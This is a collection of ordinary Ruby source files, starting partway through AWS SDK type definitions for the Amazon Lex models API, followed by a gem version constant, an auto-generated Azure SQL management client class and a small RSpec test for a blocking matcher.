# # { # messages: [ # required # { # content_type: "PlainText", # required, accepts PlainText, SSML, CustomPayload # content: "ContentString", # required # group_number: 1, # }, # ], # response_card: "ResponseCard", # } # # @!attribute [rw] messages # A collection of message objects. # @return [Array<Types::Message>] # # @!attribute [rw] response_card # At runtime, if the client is using the [PostText][1] API, Amazon Lex # includes the response card in the response. It substitutes all of # the session attributes and slot values for placeholders in the # response card. # # # # [1]: http://docs.aws.amazon.com/lex/latest/dg/API_runtime_PostText.html # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/Statement AWS API Documentation # class Statement < Struct.new( :messages, :response_card) SENSITIVE = [] include Aws::Structure end # A list of key/value pairs that identify a bot, bot alias, or bot # channel. Tag keys and values can consist of Unicode letters, digits, # white space, and any of the following symbols: \_ . : / = + - @. # # @note When making an API call, you may pass Tag # data as a hash: # # { # key: "TagKey", # required # value: "TagValue", # required # } # # @!attribute [rw] key # The key for the tag. Keys are not case-sensitive and must be unique. # @return [String] # # @!attribute [rw] value # The value associated with a key. The value may be an empty string # but it can't be null. # @return [String] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/Tag AWS API Documentation # class Tag < Struct.new( :key, :value) SENSITIVE = [] include Aws::Structure end # @note When making an API call, you may pass TagResourceRequest # data as a hash: # # { # resource_arn: "AmazonResourceName", # required # tags: [ # required # { # key: "TagKey", # required # value: "TagValue", # required # }, # ], # } # # @!attribute [rw] resource_arn # The Amazon Resource Name (ARN) of the bot, bot alias, or bot channel # to tag. # @return [String] # # @!attribute [rw] tags # A list of tag keys to add to the resource. If a tag key already # exists, the existing value is replaced with the new value. # @return [Array<Types::Tag>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/TagResourceRequest AWS API Documentation # class TagResourceRequest < Struct.new( :resource_arn, :tags) SENSITIVE = [] include Aws::Structure end # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/TagResourceResponse AWS API Documentation # class TagResourceResponse < Aws::EmptyStructure; end # @note When making an API call, you may pass UntagResourceRequest # data as a hash: # # { # resource_arn: "AmazonResourceName", # required # tag_keys: ["TagKey"], # required # } # # @!attribute [rw] resource_arn # The Amazon Resource Name (ARN) of the resource to remove the tags # from. # @return [String] # # @!attribute [rw] tag_keys # A list of tag keys to remove from the resource. If a tag key does # not exist on the resource, it is ignored. # @return [Array<String>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/UntagResourceRequest AWS API Documentation # class UntagResourceRequest < Struct.new( :resource_arn, :tag_keys) SENSITIVE = [] include Aws::Structure end # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/UntagResourceResponse AWS API Documentation # class UntagResourceResponse < Aws::EmptyStructure; end # Provides information about a single utterance that was made to your # bot. # # @!attribute [rw] utterance_string # The text that was entered by the user or the text representation of # an audio clip. # @return [String] # # @!attribute [rw] count # The number of times that the utterance was processed. # @return [Integer] # # @!attribute [rw] distinct_users # The total number of individuals that used the utterance. # @return [Integer] # # @!attribute [rw] first_uttered_date # The date that the utterance was first recorded. # @return [Time] # # @!attribute [rw] last_uttered_date # The date that the utterance was last recorded. # @return [Time] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/UtteranceData AWS API Documentation # class UtteranceData < Struct.new( :utterance_string, :count, :distinct_users, :first_uttered_date, :last_uttered_date) SENSITIVE = [] include Aws::Structure end # Provides a list of utterances that have been made to a specific # version of your bot. The list contains a maximum of 100 utterances. # # @!attribute [rw] bot_version # The version of the bot that processed the list. # @return [String] # # @!attribute [rw] utterances # One or more UtteranceData objects that contain information about the # utterances that have been made to a bot. The maximum number of # object is 100. # @return [Array<Types::UtteranceData>] # # @see http://docs.aws.amazon.com/goto/WebAPI/lex-models-2017-04-19/UtteranceList AWS API Documentation # class UtteranceList < Struct.new( :bot_version, :utterances) SENSITIVE = [] include Aws::Structure end end end
module MoreCoreExtensions VERSION = "3.7.0".freeze end
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::SQL::Mgmt::V2017_10_01_preview # # A service client - single point of access to the REST API. # class SqlManagementClient < MsRestAzure::AzureServiceClient include MsRestAzure include MsRestAzure::Serialization # @return [String] the base URI of the service. attr_accessor :base_url # @return Credentials needed for the client to connect to Azure. attr_reader :credentials # @return [String] The subscription ID that identifies an Azure # subscription. attr_accessor :subscription_id # @return [String] The API version to use for the request. attr_reader :api_version # @return [String] The preferred language for the response. attr_accessor :accept_language # @return [Integer] The retry timeout in seconds for Long Running # Operations. Default value is 30. attr_accessor :long_running_operation_retry_timeout # @return [Boolean] Whether a unique x-ms-client-request-id should be # generated. When set to true a unique x-ms-client-request-id value is # generated and included in each request. Default is true. attr_accessor :generate_client_request_id # @return [DatabaseOperations] database_operations attr_reader :database_operations # @return [ElasticPoolOperations] elastic_pool_operations attr_reader :elastic_pool_operations # @return [DatabaseVulnerabilityAssessmentScans] # database_vulnerability_assessment_scans attr_reader :database_vulnerability_assessment_scans # @return [ManagedDatabaseVulnerabilityAssessmentRuleBaselines] # managed_database_vulnerability_assessment_rule_baselines attr_reader :managed_database_vulnerability_assessment_rule_baselines # @return [ManagedDatabaseVulnerabilityAssessmentScans] # managed_database_vulnerability_assessment_scans attr_reader :managed_database_vulnerability_assessment_scans # @return [ManagedDatabaseVulnerabilityAssessments] # managed_database_vulnerability_assessments attr_reader :managed_database_vulnerability_assessments # @return [Capabilities] capabilities attr_reader :capabilities # @return [Databases] databases attr_reader :databases # @return [ElasticPools] elastic_pools attr_reader :elastic_pools # @return [InstanceFailoverGroups] instance_failover_groups attr_reader :instance_failover_groups # @return [BackupShortTermRetentionPolicies] # backup_short_term_retention_policies attr_reader :backup_short_term_retention_policies # @return [TdeCertificates] tde_certificates attr_reader :tde_certificates # @return [ManagedInstanceTdeCertificates] # managed_instance_tde_certificates attr_reader :managed_instance_tde_certificates # @return [ManagedInstanceKeys] managed_instance_keys attr_reader :managed_instance_keys # @return [ManagedInstanceEncryptionProtectors] # managed_instance_encryption_protectors attr_reader :managed_instance_encryption_protectors # @return [RecoverableManagedDatabases] recoverable_managed_databases attr_reader :recoverable_managed_databases # # Creates initializes a new instance of the SqlManagementClient class. # @param credentials [MsRest::ServiceClientCredentials] credentials to authorize HTTP requests made by the service client. # @param base_url [String] the base URI of the service. # @param options [Array] filters to be applied to the HTTP requests. # def initialize(credentials = nil, base_url = nil, options = nil) super(credentials, options) @base_url = base_url || 'https://management.azure.com' fail ArgumentError, 'invalid type of credentials input parameter' unless credentials.is_a?(MsRest::ServiceClientCredentials) unless credentials.nil? @credentials = credentials @database_operations = DatabaseOperations.new(self) @elastic_pool_operations = ElasticPoolOperations.new(self) @database_vulnerability_assessment_scans = DatabaseVulnerabilityAssessmentScans.new(self) @managed_database_vulnerability_assessment_rule_baselines = ManagedDatabaseVulnerabilityAssessmentRuleBaselines.new(self) @managed_database_vulnerability_assessment_scans = ManagedDatabaseVulnerabilityAssessmentScans.new(self) @managed_database_vulnerability_assessments = ManagedDatabaseVulnerabilityAssessments.new(self) @capabilities = Capabilities.new(self) @databases = Databases.new(self) @elastic_pools = ElasticPools.new(self) @instance_failover_groups = InstanceFailoverGroups.new(self) @backup_short_term_retention_policies = BackupShortTermRetentionPolicies.new(self) @tde_certificates = TdeCertificates.new(self) @managed_instance_tde_certificates = ManagedInstanceTdeCertificates.new(self) @managed_instance_keys = ManagedInstanceKeys.new(self) @managed_instance_encryption_protectors = ManagedInstanceEncryptionProtectors.new(self) @recoverable_managed_databases = RecoverableManagedDatabases.new(self) @api_version = '2017-10-01-preview' @accept_language = 'en-US' @long_running_operation_retry_timeout = 30 @generate_client_request_id = true add_telemetry end # # Makes a request and returns the body of the response. # @param method [Symbol] with any of the following values :get, :put, :post, :patch, :delete. # @param path [String] the path, relative to {base_url}. # @param options [Hash{String=>String}] specifying any request options like :body. # @return [Hash{String=>String}] containing the body of the response. # Example: # # request_content = "{'location':'westus','tags':{'tag1':'val1','tag2':'val2'}}" # path = "/path" # options = { # body: request_content, # query_params: {'api-version' => '2016-02-01'} # } # result = @client.make_request(:put, path, options) # def make_request(method, path, options = {}) result = make_request_with_http_info(method, path, options) result.body unless result.nil? end # # Makes a request and returns the operation response. # @param method [Symbol] with any of the following values :get, :put, :post, :patch, :delete. # @param path [String] the path, relative to {base_url}. # @param options [Hash{String=>String}] specifying any request options like :body. # @return [MsRestAzure::AzureOperationResponse] Operation response containing the request, response and status. # def make_request_with_http_info(method, path, options = {}) result = make_request_async(method, path, options).value! result.body = result.response.body.to_s.empty? ? nil : JSON.load(result.response.body) result end # # Makes a request asynchronously. # @param method [Symbol] with any of the following values :get, :put, :post, :patch, :delete. # @param path [String] the path, relative to {base_url}. # @param options [Hash{String=>String}] specifying any request options like :body. # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def make_request_async(method, path, options = {}) fail ArgumentError, 'method is nil' if method.nil? fail ArgumentError, 'path is nil' if path.nil? request_url = options[:base_url] || @base_url if(!options[:headers].nil? && !options[:headers]['Content-Type'].nil?) @request_headers['Content-Type'] = options[:headers]['Content-Type'] end request_headers = @request_headers request_headers.merge!({'accept-language' => @accept_language}) unless @accept_language.nil? options.merge!({headers: request_headers.merge(options[:headers] || {})}) options.merge!({credentials: @credentials}) unless @credentials.nil? super(request_url, method, path, options) end private # # Adds telemetry information. # def add_telemetry sdk_information = 'azure_mgmt_sql' sdk_information = "#{sdk_information}/0.17.3" add_user_agent_information(sdk_information) end end end
require 'spec_helper' require 'mspec/expectations/expectations' require 'mspec/matchers' RSpec.describe BlockingMatcher do it 'matches when a Proc blocks the caller' do expect(BlockingMatcher.new.matches?(proc { sleep })).to eq(true) end it 'does not match when a Proc does not block the caller' do expect(BlockingMatcher.new.matches?(proc { 1 })).to eq(false) end end